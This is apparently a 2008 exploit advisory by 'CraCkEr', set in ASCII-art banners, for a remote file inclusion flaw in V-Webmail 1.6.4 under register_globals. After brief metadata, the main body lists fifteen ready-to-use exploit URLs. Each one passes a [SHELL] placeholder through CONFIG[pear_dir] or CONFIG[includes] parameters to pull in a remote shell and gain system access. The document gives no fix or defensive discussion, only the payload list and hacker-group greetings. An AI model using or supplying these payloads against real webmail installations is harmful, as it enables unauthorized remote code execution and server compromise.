V-Webmail version 1.6.4 suffers from a remote file inclusion vulnerability.
30dc271e0bfaccdbf92d3d7767417cc117cba17fad430525490f8e3cb2caf6fc
┌┌───────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ [ Remote File Include ] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : N/A │ │ │
│ Script : V-webmail 1.6.4 │ │ Register Globals : │
│ Download : SourceForge.net │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : System access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
http://localhost/path/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/Net/POP3.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/Net/Socket.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/XML/Tree.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/Console/Getopt.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/System.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/Log.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/pear/File.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/mailaccess/pop3.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/prepend.php?CONFIG[includes]=[SHELL]
http://localhost/path/includes/prepend.php?CONFIG[pear_dir]=[SHELL]
http://localhost/path/includes/email.list.search.php?CONFIG[includes]=[SHELL]
http://localhost/path/includes/cachedConfig.php?CONFIG[pear_dir]=[SHELL]
└────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘